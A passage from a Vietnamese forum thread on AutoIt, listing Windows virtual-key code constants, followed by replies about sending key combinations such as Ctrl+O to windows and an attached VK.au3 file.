  Global Const $VK_F14 = 0x7D
  Global Const $VK_F15 = 0x7E
  Global Const $VK_F16 = 0x7F
  Global Const $VK_F17 = 0x80
  Global Const $VK_F18 = 0x81
  Global Const $VK_F19 = 0x82
  Global Const $VK_F20 = 0x83
  Global Const $VK_F21 = 0x84
  Global Const $VK_F22 = 0x85
  Global Const $VK_F23 = 0x86
  Global Const $VK_F24 = 0x87

  #cs
  * = 0x88 - = 0x8F : unassigned
  #ce


  Global Const $VK_NUMLOCK = 0x90
  Global Const $VK_SCROLL = 0x91

  #cs
  * NEC PC-9800 kbd definitions
  #ce


  Global Const $VK_OEM_NEC_EQUAL = 0x92 ; '=' key on numpad

  #cs
  * Fujitsu/OASYS kbd definitions
  #ce

  Global Const $VK_OEM_FJ_JISHO = 0x92 ; 'Dictionary' key
  Global Const $VK_OEM_FJ_MASSHOU = 0x93 ; 'Unregister word' key
  Global Const $VK_OEM_FJ_TOUROKU = 0x94 ; 'Register word' key
  Global Const $VK_OEM_FJ_LOYA = 0x95 ; 'Left OYAYUBI' key
  Global Const $VK_OEM_FJ_ROYA = 0x96 ; 'Right OYAYUBI' key

  #cs
  * = 0x97 - = 0x9F : unassigned
  #ce


  #cs
  * $VK_L* & $VK_R* - left and right Alt, Ctrl and Shift virtual keys.
  * Used only as parameters to GetAsyncKeyState() and GetKeyState().
  * No other API or message will distinguish left and right keys in this way.
  #ce


  Global Const $VK_LSHIFT = 0xA0
  Global Const $VK_RSHIFT = 0xA1
  Global Const $VK_LCONTROL = 0xA2
  Global Const $VK_RCONTROL = 0xA3
  Global Const $VK_LMENU = 0xA4
  Global Const $VK_RMENU = 0xA5

  Global Const $VK_BROWSER_BACK = 0xA6
  Global Const $VK_BROWSER_FORWARD = 0xA7
  Global Const $VK_BROWSER_REFRESH = 0xA8
  Global Const $VK_BROWSER_STOP = 0xA9
  Global Const $VK_BROWSER_SEARCH = 0xAA
  Global Const $VK_BROWSER_FAVORITES = 0xAB
  Global Const $VK_BROWSER_HOME = 0xAC

  Global Const $VK_VOLUME_MUTE = 0xAD
  Global Const $VK_VOLUME_DOWN = 0xAE
  Global Const $VK_VOLUME_UP = 0xAF
  Global Const $VK_MEDIA_NEXT_TRACK = 0xB0
  Global Const $VK_MEDIA_PREV_TRACK = 0xB1
  Global Const $VK_MEDIA_STOP = 0xB2
  Global Const $VK_MEDIA_PLAY_PAUSE = 0xB3
  Global Const $VK_LAUNCH_MAIL = 0xB4
  Global Const $VK_LAUNCH_MEDIA_SELECT = 0xB5
  Global Const $VK_LAUNCH_APP1 = 0xB6
  Global Const $VK_LAUNCH_APP2 = 0xB7

  #cs
  * = 0xB8 - = 0xB9 : reserved
  #ce


  Global Const $VK_OEM_1 = 0xBA ; ';:' for US
  Global Const $VK_OEM_PLUS = 0xBB ; '+' any country
  Global Const $VK_OEM_COMMA = 0xBC ; ',' any country
  Global Const $VK_OEM_MINUS = 0xBD ; '-' any country
  Global Const $VK_OEM_PERIOD = 0xBE ; '.' any country
  Global Const $VK_OEM_2 = 0xBF ; '/?' for US
  Global Const $VK_OEM_3 = 0xC0 ; '`~' for US

  #cs
  * = 0xC1 - = 0xD7 : reserved
  #ce


  #cs
  * = 0xD8 - = 0xDA : unassigned
  #ce


  Global Const $VK_OEM_4 = 0xDB ; '[{' for US
  Global Const $VK_OEM_5 = 0xDC ; '\|' for US
  Global Const $VK_OEM_6 = 0xDD ; ']}' for US
  Global Const $VK_OEM_7 = 0xDE ; ''"' for US
  Global Const $VK_OEM_8 = 0xDF

  #cs
  * = 0xE0 : reserved
  #ce


  #cs
  * Various extended or enhanced keyboards
  #ce


  Global Const $VK_OEM_AX = 0xE1 ; 'AX' key on Japanese AX kbd
  Global Const $VK_OEM_102 = 0xE2 ; "<>" or "\|" on RT 102-key kbd.
  Global Const $VK_ICO_HELP = 0xE3 ; Help key on ICO
  Global Const $VK_ICO_00 = 0xE4 ; 00 key on ICO
  Global Const $VK_PROCESSKEY = 0xE5
  Global Const $VK_ICO_CLEAR = 0xE6
  Global Const $VK_PACKET = 0xE7

  #cs
  * = 0xE8 : unassigned
  #ce


  #cs
  * Nokia/Ericsson definitions
  #ce


  Global Const $VK_OEM_RESET = 0xE9
  Global Const $VK_OEM_JUMP = 0xEA
  Global Const $VK_OEM_PA1 = 0xEB
  Global Const $VK_OEM_PA2 = 0xEC
  Global Const $VK_OEM_PA3 = 0xED
  Global Const $VK_OEM_WSCTRL = 0xEE
  Global Const $VK_OEM_CUSEL = 0xEF
  Global Const $VK_OEM_ATTN = 0xF0
  Global Const $VK_OEM_FINISH = 0xF1
  Global Const $VK_OEM_COPY = 0xF2
  Global Const $VK_OEM_AUTO = 0xF3
  Global Const $VK_OEM_ENLW = 0xF4
  Global Const $VK_OEM_BACKTAB = 0xF5
  Global Const $VK_ATTN = 0xF6
  Global Const $VK_CRSEL = 0xF7
  Global Const $VK_EXSEL = 0xF8
  Global Const $VK_EREOF = 0xF9
  Global Const $VK_PLAY = 0xFA
  Global Const $VK_ZOOM = 0xFB
  Global Const $VK_NONAME = 0xFC
  Global Const $VK_PA1 = 0xFD
  Global Const $VK_OEM_CLEAR = 0xFE

  #cs
  * = 0xFF : reserved
  #ce


  #cs
      WM_KEYDOWN = 0x100
      WM_KEYUP = 0x101
      WM_CHAR = 0x102
      WM_DEADCHAR = 0x103
      WM_SYSKEYDOWN = 0x104
      WM_SYSKEYUP = 0x105
      WM_SYSCHAR = 0x106
      WM_SYSDEADCHAR = 0x107
      WM_KEYLAST = 0x108
  Vậy là kết thúc phần này :D , ở các bài sau về UDF mình sẽ release UDF dùng để khóa cả chuột lẫn bàn phím , Phần sau sẽ đề cập về các hàm thao tác với process và Multithread trong Autoit :D
  Nguồn : kenhtrithuc.net
   
  Chỉnh sửa cuối: 11/9/15
  Phan Dong and Tungtata like this.
 2. Jkey C Phong

  Jkey C Phong Thành viên hiểu biết
  • 83/90

  Tham gia ngày:
  7/9/15
  Bài viết:
  96
  Đã được thích:
  2,443
  Nơi ở:
  Thành phố Hồ Chí Minh
  Phần đầu bị lặp lại, sửa bài đi bác!
   
  Phan Dong thích bài này.
 3. Phú Chuối

  Phú Chuối Thành viên mới
  • 3/6

  Tham gia ngày:
  6/9/15
  Bài viết:
  6
  Đã được thích:
  13
  Ok..thanks bác
   
  Phan Dong thích bài này.
 4. cuongbn9x

  cuongbn9x Thành viên mới
  • 1/6

  Tham gia ngày:
  21/2/17
  Bài viết:
  1
  Đã được thích:
  1
  Mình đang muốn send keystrokes ( tổ hợp phím kiểu Ctrl+o, Ctrl+s...) vào inactive window dùng _WinAPI_PostMessage thì làm thế nào thế bác?
   
  kamsamita1 thích bài này.
 5. luong.anhviet

  luong.anhviet Thành viên mới
  • 1/6

  Tham gia ngày:
  4/10/17
  Bài viết:
  1
  Đã được thích:
  0
  sao em k tìm được ID trong control ID nhỉ :((
   
 6. SmileOfDevil

  SmileOfDevil Thành viên mới
  • 1/6

  Tham gia ngày:
  10/8/17
  Bài viết:
  1
  Đã được thích:
  0
  em chỉ biết Send(^o) hoặc Send(^s) là gửi lệnh Ctrl+O và Ctrl+S thôi :D thay o,s,.. là bác có tổ hợp phím rồi :D
   
 7. zluuminhz

  zluuminhz Thành viên mới
  • 1/6

  Tham gia ngày:
  2/6/19
  Bài viết:
  2
  Đã được thích:
  2
  File VK.au3 cho bác nào cần nhé, có nó mới xài đc mấy Func trong ví dụ.
   

  Các file đính kèm:

  • VK.au3
   Kích thước:
   7.6 KB
   Đọc:
   21
  maiduyduc and Tungtata like this.

Chia sẻ trang này

Đang tải...